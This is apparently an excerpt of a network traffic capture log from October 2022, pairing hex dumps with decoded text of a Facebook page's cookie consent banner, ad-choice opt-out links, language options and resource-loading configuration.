                                                                                                                                  Data Ascii: \u003C\/span>\u003C\/a>\u003C\/div>\u003C\/div>\u003Cdiv id=\"cookie_banner_title\" class=\"_9o-d\">\u003Cdiv id=\"consent_cookies_title\">Allow the use of cookies from Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9o-g\"
                                                                                                                                  2022-10-17 20:07:01 UTC297INData Raw: 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 70 6f 6c 69 63 69 65 73 5c 2f 63 6f 6f 6b 69 65 73 5c 2f 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 76 5c 22 20 69 64 3d 5c 22 63 70 6e 2d 70 76 2d 6c 69 6e 6b 5c 22 3e 43 6f 6f 6b 69 65 20 50 6f 6c 69 63 79 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73
                                                                                                                                  Data Ascii: our \u003Ca href=\"https:\/\/www.facebook.com\/policies\/cookies\/\" target=\"_blank\" class=\"_9o-v\" id=\"cpn-pv-link\">Cookie Policy\u003C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Es
                                                                                                                                  2022-10-17 20:07:01 UTC298INData Raw: 20 63 6c 61 73 73 3d 5c 22 70 61 6d 20 5f 39 6f 2d 6e 20 75 69 42 6f 78 47 72 61 79 5c 22 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6f 5c 22 3e 49 66 20 79 6f 75 20 61 6c 6c 6f 77 20 74 68 65 73 65 20 63 6f 6f 6b 69 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 70 5c 22 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 5f 5c 22 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 5c 75 32 30 31 39 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 62 65 74 74 65 72 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 64 20 6d 65 61 73 75 72
                                                                                                                                  Data Ascii: class=\"pam _9o-n uiBoxGray\">\u003Cp class=\"_9o-o\">If you allow these cookies:\u003C\/p>\u003Cp class=\"_9o-p\">\u003Cul class=\"_9xp_\">\u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Facebook Products, and measur
                                                                                                                                  2022-10-17 20:07:01 UTC300INData Raw: 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 49 66 20 79 6f 75 20 68 61 76 65 20 61 20 46 61 63 65 62 6f 6f 6b 20 61 63 63 6f 75 6e 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c
                                                                                                                                  Data Ascii: 8\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">If you have a Facebook account, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\
                                                                                                                                  2022-10-17 20:07:01 UTC301INData Raw: 79 20 74 68 61 74 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 73 68 61 72 65 20 77 69 74 68 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 69 6e 74 65 72 61 63 74 69 6f 6e 73 20 77 69 74 68 20 74 68 65 6d 2c 20 73 75 63 68 20 61 73 20 76 69 73 69 74 69 6e 67 20 74 68 65 69 72 20 61 70 70 73 20 6f 72 20 77 65 62 73 69 74 65 73 2e 20 54 68 65 79 20 75 73 65 20 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e
                                                                                                                                  Data Ascii: y that businesses and organizations share with us about your interactions with them, such as visiting their apps or websites. They use our \u003Ca href=\"https:\/\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login
                                                                                                                                  2022-10-17 20:07:01 UTC303INData Raw: 33 33 65 30 0d 0a 45 6a 53 4b 54 47 72 55 66 68 38 50 75 4b 33 77 4a 57 77 52 6b 6e 4d 74 36 7a 2d 6e 73 38 56 33 38 47 48 76 4d 63 64 45 78 67 62 49 50 34 5a 48 4f 74 6d 4b 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30
                                                                                                                                  Data Ascii: 33e0EjSKTGrUfh8PuK3wJWwRknMt6z-ns8V38GHvMcdExgbIP4ZHOtmKw\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00
                                                                                                                                  2022-10-17 20:07:01 UTC304INData Raw: 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 45 59 33 79 6c 6b 7a 6c 54 41 73 69 63 73 54 43 2d 70 52 6e 45 59 5f 4e 33 6a 38 75 6d 33 6e 43 2d 51 5a 38 43 6b 73 44 37 39 68 75 34 49 62 4a 39 4a 37 61 4a 57 45 30 69 35 48 52 4f 63 7a 64 6b 67 74 6b 4d 2d 66 65 30 71 44 6e 48 51 79 46 46 39 32 57 49 4f 57 72 31 64 4a 48 79 78 67 75 76 57 75 78 76 4f 37 62 65 65 70 66 6b 71 38 39 43
                                                                                                                                  Data Ascii: class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT1EY3ylkzlTAsicsTC-pRnEY_N3j8um3nC-QZ8CksD79hu4IbJ9J7aJWE0i5HROczdkgtkM-fe0qDnHQyFF92WIOWr1dJHyxguvWuxvO7beepfkq89C
                                                                                                                                  2022-10-17 20:07:01 UTC306INData Raw: 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22
                                                                                                                                  Data Ascii: lling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\"
                                                                                                                                  2022-10-17 20:07:01 UTC307INData Raw: 6a 56 4e 4f 64 6b 71 5f 39 49 6e 58 51 73 71 74 5f 6e 6d 4b 4d 54 47 58 6a 6f 78 4d 77 49 36 4e 35 57 39 4e 61 47 73 51 48 5a 48 58 58 44 58 45 61 46 64 69 54 79 34 77 52 62 62 77 39 31 63 61 56 44 4f 4f 30 43 4e 48 36 5a 6d 75 6f 30 55 7a 4c 56 70 45 5f 6d 67 70 7a 73 61 59 41 58 36 39 55 63 31 35 63 65 37 42 73 43 44 69 53 7a 33 45 77 64 36 76 70 75 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d
                                                                                                                                  Data Ascii: jVNOdkq_9InXQsqt_nmKMTGXjoxMwI6N5W9NaGsQHZHXXDXEaFdiTy4wRbbw91caVDOO0CNH6Zmuo0UzLVpE_mgpzsaYAX69Uc15ce7BsCDiSz3Ewd6vpuA\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Internet Explorer\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=
                                                                                                                                  2022-10-17 20:07:01 UTC309INData Raw: 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 46 4a 38 63 4a 73 75 4b 30 51 68 55 4a 4b 63 66 6f 47 38 37 36 72 62 69 56 67 47 44 36 42 58 77 4b 47 42 7a 59 53 77 56 57 6e 41 39 42 37 73 44 76 6a 63 69 43 61
                                                                                                                                  Data Ascii: 003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252F&amp;h=AT2FJ8cJsuK0QhUJKcfoG876rbiVgGD6BXwKGBzYSwVWnA9B7sDvjciCa
                                                                                                                                  2022-10-17 20:07:01 UTC310INData Raw: 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 6b 78 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 77 6e 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 46 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 46 72 61 6e 5c 75 30 30 65 37 61 69 73 20 28 46 72 61 6e 63 65 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 38 5f 51 62 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 49 74 61 6c 69 61 6e 6f 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70
                                                                                                                                  Data Ascii: _markup_3310c079_0_5_kx",{"__html":"Espa\u00f1ol"},1],["__markup_3310c079_0_6_wn",{"__html":"Espa\u00f1ol (Espa\u00f1a)"},1],["__markup_3310c079_0_7_Fe",{"__html":"Fran\u00e7ais (France)"},1],["__markup_3310c079_0_8_Qb",{"__html":"Italiano"},1],["__markup
                                                                                                                                  2022-10-17 20:07:01 UTC311INData Raw: 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 35 33 66 30 5c 75 37 30 36 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 51 51 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 74 5f 48 6e 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 39 39 39 39 5c 75 36 65 32 66 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 75 5f 41 2b 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 36 35 65 35 5c 75 36 37 32 63 5c 75 38 61 39 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31
                                                                                                                                  Data Ascii: l":"\u4e2d\u6587(\u53f0\u7063)"},1],["__markup_3310c079_0_s_QQ",{"__html":"\u4e2d\u6587(\u7b80\u4f53)"},1],["__markup_3310c079_0_t_Hn",{"__html":"\u4e2d\u6587(\u9999\u6e2f)"},1],["__markup_3310c079_0_u_A+",{"__html":"\u65e5\u672c\u8a9e"},1],["__markup_331
                                                                                                                                  2022-10-17 20:07:01 UTC313INData Raw: 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46 61 64 73 5c 75 30 30 32 35 32 46 6d 61 6e 61 67 65 72 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 5c 75 30 30 32 35 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 7d 5d 5d 2c 5b 22 55 49 54 69 6e 79 56 69 65 77 70 6f 72 74 41 63 74 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 5d 2c 5b 5d 5d 2c 5b 22 52 65 73 65 74 53 63 72 6f 6c 6c 4f 6e 55 6e 6c 6f 61 64 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 68 79 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 30 5f 68 79 22 7d 5d 5d 2c 5b 22 41 63 63 65 73 73 69 62 69 6c 69 74 79 57 65 62 56 69 72 74 75 61 6c 43 75 72 73 6f
                                                                                                                                  Data Ascii: www.facebook.com\u00252Fads\u00252Fmanager\u00252Faccount_settings\u00252Faccount_billing"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_hy"],[{"__m":"__elem_a588f507_0_0_hy"}]],["AccessibilityWebVirtualCurso
                                                                                                                                  2022-10-17 20:07:01 UTC314INData Raw: 69 61 6c 6f 67 43 42 54 53 65 74 74 65 72 22 2c 22 73 65 74 43 42 54 49 6e 46 6f 72 6d 41 6e 64 4c 6f 67 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 72 64 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 38 33 35 63 36 33 33 61 5f 30 5f 30 5f 72 64 22 7d 2c 22 63 6c 69 65 6e 74 5f 6c 6f 67 67 65 64 5f 6f 75 74 5f 69 6e 69 74 5f 69 6d 70 72 65 73 73 69 6f 6e 22 5d 5d 2c 5b 22 42 72 6f 77 73 65 72 50 72 65 66 69 6c 6c 4c 6f 67 67 69 6e 67 22 2c 22 69 6e 69 74 43 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 4c 6f 67 67 69 6e 67 22 2c 5b 5d 2c 5b 7b 22 63 6f 6e 74 61 63 74 70 6f 69 6e 74 46 69 65 6c 64 49 44 22 3a 22 65 6d 61 69 6c 22 2c 22 73 65 72 76 65 72 50 72 65 66 69 6c 6c 22 3a 22 22 7d 5d 5d 2c 5b 22 46 6f 63 75
                                                                                                                                  Data Ascii: ialogCBTSetter","setCBTInFormAndLog",["__elem_835c633a_0_0_rd"],[{"__m":"__elem_835c633a_0_0_rd"},"client_logged_out_init_impression"]],["BrowserPrefillLogging","initContactpointFieldLogging",[],[{"contactpointFieldID":"email","serverPrefill":""}]],["Focu
                                                                                                                                  2022-10-17 20:07:01 UTC316INData Raw: 31 34 37 38 0d 0a 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 73 64 22 5d 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22 50 61 67 65 54 72 61 6e 73 69 74 69 6f 6e 73 22 2c 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 22 63 73 73 22 5d 5d 2c 5b 22 54 69 6d 65 53 6c 69 63 65 49 6d 70 6c 22 5d 2c 5b 22 48 61 73 74 65 53 75 70 70 6f 72 74 44 61 74 61 22 5d 2c 5b 22 53 65 72
                                                                                                                                  Data Ascii: 1478anzaiScuba_DEPRECATED","PageTransitions","Animation"],"sd"]],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","PageTransitions","Animation"],"css"]],["TimeSliceImpl"],["HasteSupportData"],["Ser
                                                                                                                                  2022-10-17 20:07:01 UTC317INData Raw: 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 53 2f 6c 2f 30 2c 63 72 6f 73 73 2f 32 76 51 72 39 58 61 47 56 53 46 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 64 2f 6c 2f 30 2c 63 72 6f 73 73 2f 44 41 54 67 4a 75 4e 70 65 41 4f 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22
                                                                                                                                  Data Ascii: oad" href="https://static.xx.fbcdn.net/rsrc.php/v3/yS/l/0,cross/2vQr9XaGVSF.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/DATgJuNpeAO.css?_nc_x=Ij3Wp8lg5Kz" as="
                                                                                                                                  2022-10-17 20:07:01 UTC319INData Raw: 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 63 72 69 70 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6e 6f 6e 63 65 3d 22 78 46 67 69 6a 41 33 64 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 5f 2f 6c 2f 30 2c 63 72 6f 73 73 2f 76 63 50 71 54 69 52 77 49 69 55 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66
                                                                                                                                  Data Ascii: .js?_nc_x=Ij3Wp8lg5Kz" as="script" crossorigin="anonymous" nonce="xFgijA3d" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y_/l/0,cross/vcPqTiRwIiU.css?_nc_x=Ij3Wp8lg5Kz" as="style" crossorigin="anonymous" /><link rel="preload" href
                                                                                                                                  2022-10-17 20:07:01 UTC320INData Raw: 22 2c 22 41 63 6d 5a 31 35 6d 22 2c 22 73 6a 43 51 65 7a 61 22 2c 22 59 6f 32 55 7a 4f 68 22 2c 22 50 2f 6d 72 35 56 45 22 2c 22 5a 38 7a 36 59 6f 30 22 2c 22 63 68 58 77 50 72 55 22 5d 2c 69 64 3a 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 70 68 61 73 65 3a 30 2c 6c 61 73 74 5f 69 6e 5f 70 68 61 73 65 3a 74 72 75 65 2c 74 74 69 5f 70 68 61 73 65 3a 30 2c 61 6c 6c 5f 70 68 61 73 65 73 3a 5b 36 33 5d 2c 68 73 72 70 3a 7b 68 62 6c 70 3a 7b 63 6f 6e 73 69 73 74 65 6e 63 79 3a 7b 72 65 76 3a 31 30 30 36 34 30 32 37 31 31 7d 7d 7d 2c 61 6c 6c 52 65 73 6f 75 72 63 65 73 3a 5b 22 5a 36 4b 4e 6e 34 51 22 2c 22 68 79 4b 6d 70 75 75 22 2c 22 4b 68 62 44 71 4c 6d 22 2c 22 45 43 33 61 59 43 6f 22 2c 22 78 4e 55 41 4f 72 46 22 2c 22 6e 36 57 34 78 4d 48 22 2c
                                                                                                                                  Data Ascii: ","AcmZ15m","sjCQeza","Yo2UzOh","P/mr5VE","Z8z6Yo0","chXwPrU"],id:"first_response",phase:0,last_in_phase:true,tti_phase:0,all_phases:[63],hsrp:{hblp:{consistency:{rev:1006402711}}},allResources:["Z6KNn4Q","hyKmpuu","KhbDqLm","EC3aYCo","xNUAOrF","n6W4xMH",
                                                                                                                                  2022-10-17 20:07:01 UTC322INData Raw: 6e 3a 30 2c 6d 61 78 42 6c 6f 63 6b 4d 65 72 67 65 44 69 73 74 61 6e 63 65 3a 30 2c 65 6e 61 62 6c 65 5f 62 61 6e 7a 61 69 5f 73 74 72 65 61 6d 3a 74 72 75 65 2c 75 73 65 72 5f 74 69 6d 69 6e 67 5f 63 6f 69 6e 66 6c 69 70 3a 35 30 2c 62 61 6e 7a 61 69 5f 73 74 72 65 61 6d 5f 63 6f 69 6e 66 6c 69 70 3a 30 2c 63 6f 6d 70 72 65 73 73 69 6f 6e 5f 65 6e 61 62 6c 65 64 3a 74 72 75 65 2c 72 65 66 5f 63 6f 75 6e 74 69 6e 67 5f 66 69 78 3a 66 61 6c 73 65 2c 72 65 66 5f 63 6f 75 6e 74 69 6e 67 5f 63 6f 6e 74 5f 66 69 78 3a 66 61 6c 73 65 2c 61 6c 73 6f 5f 72 65 63 6f 72 64 5f 6e 65 77 5f 74 69 6d 65 73 6c 69 63 65 5f 66 6f 72 6d 61 74 3a 66 61 6c 73 65 2c 66 6f 72 63 65 5f 61 73 79 6e 63 5f 72 65 71 75 65 73 74 5f 74 72 61 63 69 6e 67 5f 6f 6e 3a 66 61 6c 73 65 7d
                                                                                                                                  Data Ascii: n:0,maxBlockMergeDistance:0,enable_banzai_stream:true,user_timing_coinflip:50,banzai_stream_coinflip:0,compression_enabled:true,ref_counting_fix:false,ref_counting_cont_fix:false,also_record_new_timeslice_format:false,force_async_request_tracing_on:false}
